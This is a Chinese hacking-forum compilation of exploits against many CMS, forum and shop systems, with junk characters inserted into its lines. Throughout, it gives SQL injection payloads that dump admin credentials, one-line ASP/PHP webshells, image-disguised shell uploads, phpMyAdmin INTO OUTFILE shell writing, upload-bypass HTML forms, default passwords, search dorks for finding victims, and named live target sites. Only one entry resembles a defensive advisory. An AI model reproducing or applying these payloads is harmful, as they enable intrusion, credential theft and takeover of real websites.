启航企业建站系统 cookie注入漏洞通杀所有版本4 B+ _( k# c+ p
2 l6 ~9 T% J. X; [直接上exploit: w1 Z% q: Y( x2 ^1 L: f
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
$ x; D0 b* |# C" Stest:http://www.tb11.net/system/xitong/shownews.asp?id=210
# _8 V% |# n* m O( T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- x/ g5 T# S5 C) x
Asprain论坛 注册用户 上传图片就可拿到webshell: \# K) O/ t6 a( Y) g; r
' s& j& J# |# J; ?- F! f. X
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。* s, G, E9 P7 n; B2 d* t1 E
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
3 e. t1 D. R( W; y* t# l- T2.gif 为一小图片文件,一定要小,比如qq表情图片
. S: y9 y4 v% |: [3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
* x" B2 E, |2 q4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
l. A6 w# P6 f" k) D$ `) ]. Q( K# Z5.q.asp;.gif2 j" K5 l' }. M7 ~. w' k
google:Powered by Asprain
- w' T2 S, T3 ?2 ]5 I7 L--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) v3 Q& |/ N/ y2 ?
+ z: O7 i$ F: o* A- q% E+ y3 b9 Y: tShopNum1全部系统存在上传漏洞。$ H- x0 q2 L: z4 A2 X( P$ H
8 h; b' V$ m5 S+ y) K( [# A首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
- C* U, N+ |1 o3 r; t按说明 提示登录后台。。
' l* g' b Z- v在后台功能页面->附件管理->附件列表5 B5 v- P% n6 U, p
可以直接上传.aspx 后缀木马; b/ _" c0 |6 m* v4 n/ v4 P& \
http://demo.shopnum1.com/upload/20110720083822500.aspx& |4 }/ d* Y0 E p7 |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! \1 G, y9 N& l: c, r! L0 `) s" d5 e7 F( I; |% N3 L- \: F
牛牛CMS中小企业网站管理系统 上传漏洞- Z3 j) [# |& Q/ p; q
( P* Z+ c# J7 C% a: C牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
; z: U1 J( [7 J/ F J后台:admin/login.asp
2 b' J2 X* ]0 r N/ B* a, K( Qewebeditor 5.5 Nday; y4 |/ l% C# p
exp:
* [( V3 E6 ~) N. Q<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
$ c/ b% N2 ~' A& j% E<input?type=file?name=uploadfile?size=100><br><br>?
0 |+ O( w8 H; t+ e: P<input?type=submit?value=upload>?5 D ~7 j) u4 a3 I o+ e# C
</form>1 v: i( c2 p. J" e7 H7 a3 y f
ps:先上传小马.' I. P* z/ E% e! D- P
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
" z9 b; M- u- b7 J; Y- P6 I: v9 f }
$ ~- u. u/ h! }$ D+ s$ t1 K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 E4 o( B1 B* y& E+ \1 f9 _) Y
2 S! N0 s6 X. H1 v
YothCMS 遍历目录漏洞5 \3 B: X! W1 X2 ^6 Y
4 [/ K+ g& h8 A# _优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
! u' s, e0 f" g0 Y( Y默认后台:admin/login.asp. C s" K% @" G+ |- [+ R# w, h, p
遍历目录:
7 _7 F& c' w% a% }$ V& dewebeditor/manage/upload.asp?id=1&dir=../
/ i% `1 r' R' U2 X7 D2 r# ~data:
: I) n9 m. Z. l5 f. r# K/ Yhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa0 v. h6 ]* F' U2 f) R& X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 U! [+ d1 s+ r* `; f3 K
; l: L0 }, x5 z' f4 b1 fNet112企业建站系统 1.0, o! r0 D- P5 T7 s
- t, n- w4 V# W; I2 D3 A
源码简介:2 }: c' b' g+ Y/ P& C
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
l/ _4 v* S4 y. Y8 k添加管理员:& v O( l# j2 d( S- N
http://www.0855.tv/admin/admin.asp?action=add&level=2
p! i) e, g f- h其实加不加都不是很重要,后台文件都没怎么作验证。; S) ?& o$ O& }/ U- d. C
上传路径:, R& z3 L5 G- q" i; q/ k
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
1 a1 L; b2 D; e) }3 W0 c8 p# G+ _* shttp://www.0855.tv/inc/Upfile.asp?Stype=24 l0 F' T# L" u+ L) T1 O) j- e$ w
怎么利用自己研究。( ]! D/ d; z! o; [+ a
遍历目录:6 O1 F* l" j, o9 l! p! b
http://www.0855.tv/admin/upfile.asp?path=../..
N/ j/ y% z" s2 J0 H4 u5 [如:' `8 U ^( p. W( `
http://www.0855.tv/admin/upfile.asp?path=../admin
$ K# n# E# N) \! s2 ]' ahttp://www.0855.tv/admin/upfile.asp?path=../data
. ?* C0 P+ x6 O5 J2 C--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 r9 S6 k" K9 T7 k! K
4 j! |5 p/ |7 `) F# j, j
易和阳光购物商城通杀 上传漏洞3 K6 k! V, R0 N: f8 R! T o/ {
% l2 b; k, `* ^7 C/ j# C
前提要求是IIS6.0+asp坏境。
$ o: E0 _: F6 r. }0 z1 h漏洞文件Iheeo_upfile.asp
* {$ `7 _1 ^; ]0 T) k过滤不严.直接可以iis6.0上传) T- N5 Y; ?0 z* o
把ASP木马改成0855.asp;1.gif
; f: ^7 M1 {# E4 _1 |1 B2 G直接放到明小子上传7 U! k4 X5 v: q2 o
Google搜索:inurl:product.asp?Iheeoid= G+ x8 H7 X9 z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" S; m3 r: R) g5 h1 P/ i: _
% o p' O4 U) _phpmyadmin后台4种拿shell方法8 F2 s \2 R j: @ H* Z" t
0 t$ x9 E% X. W/ u4 `- z
方法一:$ g- k. P2 S" a
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
( _2 J, z0 u" r. @# s" n( CINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');$ S8 L. o+ i8 h
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
) v W- J T9 l! U----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php1 I `; m' ?* x ^ w G
一句话连接密码:xiaoma
2 |: V' \. J3 V1 K0 Y' b/ s方法二:7 {& h# Q0 s0 `# S6 d& F- l
Create TABLE xiaoma (xiaoma1 text NOT NULL);- x2 w8 o5 \* P" D) U. c
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');. N3 {+ B% o/ }* _
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
$ U) a4 x2 p/ t. B4 q, j' o" J0 lDrop TABLE IF EXISTS xiaoma; w# ?1 n5 p! ]3 q) H+ |4 o
方法三:
) a; N. I: N) u# h读取文件内容: select load_file('E:/xamp/www/s.php');
8 z8 Y7 l9 Q+ K1 P写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
2 ^: t+ u _# E5 Vcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
4 r& h4 f5 ~4 E' F S: ~" S方法四:
! ` X: K" R2 v" i2 |9 g5 Aselect load_file('E:/xamp/www/xiaoma.php');+ o0 ~0 F/ {* j% d4 x
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
& n' m! u A B: Z然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
$ C7 x% Q2 o5 H2 G# k$ y* c* m( r--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! _* G. k0 h- T4 t2 I2 P9 @$ [' v4 G! e4 @' p
传信网络独立开发网站源码0day漏洞+ C7 [4 U& y" O9 T" [4 {; b% T
, o& ` B+ b3 ? v! T/ P3 F [7 I
后台system/login.asp
& |0 [% H2 @( o+ _8 K" |进了后台有个ewebeditor
6 K& L/ Y& z6 ?! S) fGoogle 搜索inurl:product1.asp?tyc=, m; J9 p" N( A+ \6 `0 m5 x6 s& K
编辑器漏洞默认后台ubbcode/admin_login.asp; \( g5 l9 r. a
数据库ubbcode/db/ewebeditor.mdb; Q: e \4 q, |( _/ u
默认账号密码yzm 111111
3 M' `% ?/ f# Z6 C/ l5 _( ?; F8 R! v+ J5 O6 O
拿webshell方法' A0 \- k9 n/ |; ^6 U n9 g
登陆后台点击“样式管理”-选择新增样式
2 Q7 n, A6 T. i2 V样式名称:scriptkiddies 随便写
5 P0 i P+ y M. o6 U& M路径模式:选择绝对路径
; Y8 G: q/ a7 C9 D5 [* r图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx' g2 P4 u) n5 M4 C
图片类型比如就是我们要上传的ASP木马格式* K- d6 }/ L# q$ W k
上传路径:/
G8 L1 R" c0 `) O* q图片限制:写上1000 免的上不了我们的asp木马
9 X- D$ p1 h$ K9 \/ c* L0 s上传内容不要写" N, C, g& J( \( W' p
可以提交了
8 {& @4 S/ y1 A2 {* s; f, q- e' Y样式增加成功!
' j& R) Z9 f2 y7 m返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 7 D: [ @/ w3 i
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
7 P- Y8 S" Q" O* @& x: F网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies5 T# Q/ h8 i1 [
上ASP木马 回车 等到路径. W4 ^' m" w: \: i) z5 n, x
% C+ Q. e1 q8 |; {0 |6 l# o+ s& u后台:system/login.asp
: {1 _! I! z. x$ Q+ X. _9 \! w0 J: cExp:
( x8 B7 _1 ^4 jand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
% Y* i6 [& W9 |% S1 M' @测试:9 r7 n0 J2 {0 H- i& x; U
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
0 K8 o7 ?5 a8 x; g: v/ }/ x; v& ihttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
: E2 _ j8 Z5 X0 j6 V+ m--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ m2 m, m# W% y1 J' ]& g5 D( t4 r8 g5 [7 I/ G: K5 t
foosun 0day 最新注入漏洞
5 V0 `) j, m5 L) |8 e8 i) g7 F/ R. _/ w3 o, N# ^7 _3 F& y6 g8 q# [
漏洞文件:www.xxx.com/user/SetNextOptions.asp1 d/ ]+ U; U. j5 E8 `9 x8 J4 n
利用简单的方法:6 j; E- c9 ^6 z) O9 F
暴管理员帐号:
; ]1 j' {5 V8 p! O0 C1 Thttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin+ U4 p5 W# ]5 A; e* t
暴管理员密码:
: ?+ p# U7 p" ]8 Xhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
! P- S ]( G% x( t; [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 C" N( {6 \! a4 D8 |+ g
0 W; U1 y3 r f3 k2 [4 u网站程序的版权未知!( T' I, A! G7 @
* A9 J8 R- T# p4 g默认网站数据库:
* o( L! u' L$ @www.i0day.com/data/nxnews.mdb% q1 X; c9 S' Z T& |2 U
ewebeditor 在线编辑器:, t) s9 S0 P+ G; \6 f3 u3 @
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb1 @- v$ [9 D( J1 o
登录地址:ewebeditor/admin_login.asp9 M' H! c& O. Q9 a
默认密码:admin admin- E& I) J9 m" |0 w9 b9 j. q# K. g
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
R* a1 _8 P2 s+ B
, _( h. h/ f0 B j) @4 P, Y0 v$ v$ ?6 kSql注入漏洞:0 |$ L' M" @& i1 ?" x f
http://www.i0day.com/detail.asp?id=123 B% p' `% [& Y7 z
exp:
5 Y0 H9 ]* X8 } K( Hunion select 1,admin,password,4,5,6,7,8 from admin
1 M, v) H2 a; ^: ~5 G爆出明文帐号/密码2 {# Z9 _) Q7 M6 Y w! s" a
' v9 F& _& g5 \0 Y上传漏洞:. N# P1 ?) ?; R1 Z. Z* v1 _# y6 S9 p6 k* A
后台+upfile.asp1 [$ |& ^- G( ^. Z1 [7 B
如:
# |( V2 w. ^ }! I/ o6 s+ V ^4 whttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
0 s3 q2 T8 L( H7 ?shell的地址:网址+后台+成功上传的马$ O. i8 d- X3 u2 Y& ]
google:inurl:news.asp?lanmuName=
$ T1 }! V; t- y) k1 C------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 G1 t K4 A) T
7 c, g& |2 e/ s7 h8 w& j4 O2 M; K/ Ededecms最新0day利用不进后台直接拿WEBSHELL
* @9 m, W% P# C3 `2 x& W6 x8 h9 j# {. W4 k1 F
拿webshell的方法如下:) Z! |1 J! D) L5 P0 P4 S3 M
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
+ q" L1 C- l$ I6 J前题条件,必须准备好自己的dede数据库,然后插入数据:
( F) ?6 R$ R6 tinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
^: i* D# I% Q5 Y6 G) K* P# K( ^2 ~6 ]
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
: w( _9 N# F8 c9 v8 r<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"># R% v- Q M9 t$ r" d
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />. o4 T+ M* x. H8 c/ l4 N9 n+ t
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />" i( M& E$ O# i$ C1 t9 O2 n
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />0 U; b% A$ K4 f+ ~) W/ F. F$ O, h
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
+ e6 A+ l: q4 F! k! w8 C( F<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />" R, ~7 \4 t; K. ]9 S q
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />6 }7 ]! {) |8 o$ x# [ G. m7 C
<input type="text" value="true" name="nocache" style="width:400">$ Y: f# V. D# A& F% l
<input type="submit" value="提交" name="QuickSearchBtn"><br />/ M* \" S; A( e' E1 m( V- L% j
</form>, L5 t- A9 N' }* h
<script>
7 ~+ D+ o9 Q- T, j9 ffunction addaction()
) |5 x8 U7 c/ h$ D' B{7 o- j: O' s6 l/ r9 k
document.QuickSearch.action=document.QuickSearch.doaction.value;1 V1 ?4 p! }& F7 ?. ^9 i
}7 p2 e4 L* e U1 m7 G4 l9 m3 Q
</script>* g6 f/ P$ ^8 w3 F3 ~
-----------------------------------------------------------------------------------------------------------------------------------------------) B2 ]! M: R4 C( b3 P! g0 Y
: B+ {( }: F: J4 A1 h6 @
dedecms织梦暴最新严重0day漏洞
) G4 m9 s" f4 m) X/ C: W% Fbug被利用步骤如下:7 ]3 v- }1 M- L6 |" H
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root8 z) J% s) x7 O, D
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。" x0 Y2 }8 z; [" | X
-------------------------------------------------------------------------------------------------------------------------------------------
8 d1 S( ?$ e0 ^0 e8 I& z. w, R4 l; v- G, \
多多淘宝客程序上传漏洞 ; J, v; a- V( \- b2 I @- c
漏洞页面:
0 f, B$ k. e D9 radmin\upload_pic.php1 t1 M& o% c5 r* a3 i( m8 U, N
传送门:/ `: K7 _. c& W$ m# c9 p2 J
http://www.www.com/admin/upload_pic.php?uploadtext=slide14 G- K) Q0 ^* s3 ^
PS:copy张图片马 直接 xxx.php 上传抓包地址!" M, R9 a& l: n/ @4 |7 h
------------------------------------------------------------------------------------------------------------------------------------------------------
4 Y8 L4 l4 c# ]0 m( O$ o" ]+ O! g7 g0 X/ o/ q& q- ?! j
无忧公司系统ASP专业版后台上传漏洞4 F- o n {! X { }% Q
漏洞文件 后台上传 I' X/ Y# {4 X' C9 k
admin/uploadPic.asp
' W" t% @; X& c N, Q" \! P& ^: M, _漏洞利用 这个漏洞好像是雷池的
" a% n- ` p) K' K1 o1 qhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
) m. W8 ]7 y4 S# }& O等到的webshell路径:
+ y7 c# l, [; P2 C8 P/UploadFiles/scriptkiddies.asp;_2.gif
& O4 E) Z; m) a# Q1 L---------------------------------------------------------------------------------------------------------------------------------------------------: w: B! M3 [0 j0 l, z( X/ P
; [4 c% [# U! k: U, U住哪酒店分销联盟系统20102 o" ~' n" K+ V& x; ]( T8 L( M
Search:/ T3 J& G" n- X/ u) Q( c$ ~1 }
inurl:index.php?m=hotelinfo
3 N4 w: E- Z3 i" s; ?' I+ q! e( Whttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin# L* |2 M) l2 v% I' ~! V* x
默认后台:index.php?m=admin/login
0 H2 `9 n0 o$ ^ h--------------------------------------------------------------------------------------------------------------------------------------------------
; R7 B& l Y. V2 r9 d: X( {& O+ T( N) u% @7 a" F; q
inurl:info_Print.asp?ArticleID=
; m& M5 s1 P3 M; V' J$ V* _后台 ad_login.asp
! V. r! p/ q5 Y" @爆管理员密码:/ A! l" h4 ^5 G% P$ R7 n- O0 n
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin$ A# k4 w U* Q' m3 t* c0 I
------------------------------------------------------------------------------------------------------------------------------------------------------------; [4 h; E7 H- s3 b
7 X( i+ j, ^3 H# o- T
搜索框漏洞!
( ~. B' ]- q |%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'=' }) j9 L& {+ p3 _# s3 I, Q+ x9 V
--------------------------------------------------------------------------------------------------------------------------------------------------------
' o: B" v8 h$ _5 ~' m, V
& J1 p+ k- t6 w; J! B4 o5 n关键字:
3 Z3 }8 w8 S% `% z% A4 W' V3 kinurl:/reg_TemletSel.asp?step=21 M% r1 P$ |$ f! Z
或者& z/ j' y3 c5 T6 U. J- L0 Z5 @
电子商务自助建站--您理想的助手
% C; T+ b6 d. c! C, \: m-------------------------------------------------------------------------------------------------------------------------------------------------
! P; [% J- B3 c8 Z6 X- ?
( A% h' F2 V( G$ wiGiveTest 2.1.0注入漏洞3 g$ Y! j5 u0 c- O
Version: <= 2.1.0$ ~ O9 b+ h* h; O8 E; K
# Homepage: http://iGiveTest.com/, M. W+ S* U# q3 a* H" o
谷歌关键字: “Powered by iGiveTest”" g( J( L% M. o0 Y; D( u$ B
随便注册一个帐号。然后暴管理员帐号和密码
; y$ e; S3 V" x( ?) o/ Rhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1: H3 J" G8 X, p- g, t4 H
------------------------------------------------------------------------------------------------------------------------------------------------% \& T' a3 ]5 [6 O0 ~0 C# d) \2 m
) q' k8 f. G6 f" ]& S) Z* `CKXP网上书店注入漏洞
, H4 p: g( |, J# q2 n C8 ^工具加表:shop_admin 加字段:admin0 l2 U ?( m# q8 v% |( V
后台:admin/login.asp
5 i8 U* j& ~, Q8 f; h8 F* T! z登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
- }: |: w6 |+ \2 zinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息- D9 \( H8 B3 A/ [+ N8 {: Y5 X9 d
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 W) Z, e+ e' S5 t1 J. z7 l( Z" [
4 A- A l' R7 @0 W4 U段富超个人网站系统留言本写马漏洞
( p4 Z/ e0 J2 y4 Z源码下载:http://www.mycodes.net/24/2149.htm
& e; S, Y* t* t; zaddgbook.asp 提交一句话。( x' V' T7 S! o- O; C
连接: http://www.xxxx.tv/date/date3f.asp y' s; o6 p. M# L% C8 z2 ^
google:为防批量,特略!; {6 R* ]1 B- r& A6 \ b* M
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
b! @# k0 W4 a H2 f3 X9 p8 c! u
智有道专业旅游系统v1.0 注入及列目录漏洞
# R8 K, H4 V* q1 Z& ^默认后台路径:/admin/login.asp- ~# \0 L" ?; U/ J; H
默认管理员:admin
+ Y4 z7 A4 H4 i; n) g默认密码:1234561 j0 W4 \+ Y; D% L8 F. x
SQL EXP Tset:; b0 @% y. u: l
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
2 Y" V+ [7 G7 g/ O3 {$ g------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" A! M% I: L P# \" N* F( n' f8 i" J* w, j3 h
ewebeditor(PHP) Ver 3.8 本任意文件上传0day8 _2 _. v/ M; o' s& i- ?5 c/ O
EXP: P8 ~1 {" d7 X. c- @9 t: c
<title>eWebeditoR3.8 for php任意文件上EXP</title>" Q: J4 V( t9 `# [, R9 _
<form action="" method=post enctype="multip
7 ~, P K- s' [ z1 v- h& [; Oart/form-data">
$ f w& U" e7 s P* D. h<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 3 Y! _; y) G' R! d6 c. g& c
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> / j& i% g/ }2 E8 o3 c) {1 H
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
6 i' l% `3 x$ Y- h' G: mfile:<input type=file name="uploadfile"><br>
( k' U' e( `; q# X* T<input type=button value=submit onclick=fsubmit()> 1 o7 o+ i$ f4 B3 m6 N: G) K
</form><br>
/ v$ `) ~ o3 j1 }6 }<script>
& C- r3 W; f4 n0 _( hfunction fsubmit(){
* \! ?0 w' Q$ }; x5 `' t/ Q. Cform = document.forms[0]; ' V$ t1 X+ M) ~/ U
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
9 q t5 e1 i7 S0 Z; d# |alert(form.action); ' M- `1 S+ q y8 l; N) R/ G
form.submit(); : T- I5 L2 H* }5 h5 H
}
5 r9 u" a# A7 {* d; m9 }& Y</script>5 e. W9 o; _/ i3 `; l
注意修改里面ewebeditor的名称还有路径。9 Z' j! @4 [' m; L
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# [+ B( A' ]; l6 Z# V7 E r8 m, w( a" |
提交’时提示ip被记录 防注入系统的利用8 P& }4 v( r% b2 l
网址:http://www.xxx.com/newslist.asp?id=122′
/ _6 y' V. o6 \4 f3 ] O! _提示“你的操作已被记录!”等信息。0 q+ u6 M7 ]# D+ K M1 W
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。 T/ M2 q6 H( M- \( ?! t
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ f3 ^+ X' F$ x9 c g$ z( L% q6 l* [8 H
西部商务网站管理系统 批量拿shell-0day2 Y5 e8 Z( z9 U; x; ~# H+ R
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
. r6 p( ?+ o: h* e2 `* }2 c) W1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
. E7 ?1 u! d N9 H; J: l2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合; A$ t) P3 u7 W9 `9 N8 \5 S
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
* q2 R3 n* E o. n+ L---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* I3 h: } ?- T3 U% e! d* `
4 z E" Y" e( s( rJspRun!6.0 论坛管理后台注入漏洞8 z0 O- l' k# n9 V
$ P; O" Q2 N& j V- T$ N& uSEBUG-ID:20787 发布时间:2011-04-30 影响版本:* b7 ]: k0 O6 P+ x1 v8 B4 B( X( Y% M
JspRun!6.0
0 z! o- d' Y* q漏洞描述:$ i9 p0 S* x& e3 v" z
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。" J4 A- P* `5 h
在处理后台提交的文件中ForumManageAction.java第1940行, } z( O% _( @8 J. p6 \
String export = request.getParameter("export");//直接获取,没有安全过滤. P! L* v" P- F9 `$ ?# ^0 d% A6 w
if(export!=null){
8 { K7 {4 j2 y5 Y. ]List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...; O' Z3 Y1 p; i& p0 V
if(styles==null||styles.size()==0){: v! o/ h6 _% }$ o1 q) Q) ?4 }
<*参考! L/ P2 i$ F: q5 ^/ S8 |
nuanfan@gmail.com+ I, X6 v/ {- ~! X& m
*> SEBUG安全建议:+ j5 s$ I7 v& i# i- K
www.jsprun.net4 Q1 D7 f1 V" w2 ^ Z( R5 q% |% ^
(1)安全过滤变量export
0 h W- m: p: U3 ?' }(2)在查询语句中使用占位符
; g! y1 p ^% e/ y/ {------------------------------------------------------------------------------------------------------------------------------------------------------------------------------; i9 _2 |" f# `) G2 t9 ?
8 D1 ?3 L+ x9 ^! V- B乌邦图企业网站系统 cookies 注入6 D' J8 b7 Y% B, ^* g; B8 q
- G. w4 R& v2 ?0 _8 z程序完整登陆后台:/admin/login.asp4 Z+ k8 n% u2 Q& ]) V
默认登陆帐号:admin 密码:admin888
7 y# u0 ]3 L6 i语句:(前面加个空格)
0 I9 t" ^" @/ M! L2 Pand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
- E0 U* s2 ]6 Y ^! b9 w. i. C或者是16个字段:
1 o# F! e8 a2 O Xand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin! R1 W" s1 i N5 u
爆不出来自己猜字段。
9 e" ~ C4 g, t G" Z; s注入点:http://www.untnt.com/shownews.asp?=88
% `: s$ ]' y6 P: U$ Hgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
- ~! M% c, ~9 D! n0 K: R# [关键字:1 W9 p* R( |4 B/ E K
inurl:shownews?asp.id=" ?+ O$ Q) y1 F7 @: M0 z
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------; c) `( w9 B3 x4 @6 r7 Y# A4 b
# c$ r: J0 Z4 |) ^CKXP网上书店注入漏洞
, i) w2 o4 k1 z5 a' k d2 D9 S/ A6 T5 b8 X! P2 r4 h) s$ V
工具加表:shop_admin 加字段:admin1 n/ q1 a' ?4 y, Q1 b7 X Q. v
后台:admin/login.asp " t. b8 N3 ], b0 k4 l5 E
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/7 F8 f3 u0 d5 _8 R
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息9 y7 C1 C G4 f$ }8 V/ ^, y f2 X
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( }- s; k3 g* d2 o& z( p H1 O2 g2 x. `1 ^4 {& J1 Y# Q
YxShop易想购物商城4.7.1版本任意文件上传漏洞
" G- m" r8 S8 [1 ~7 j- a
7 _4 J, v& W8 J2 e( c: s' ghttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
- s: j( S" [4 _( b/ e/ o+ t7 p跳转到网站根目录上传任意文件。
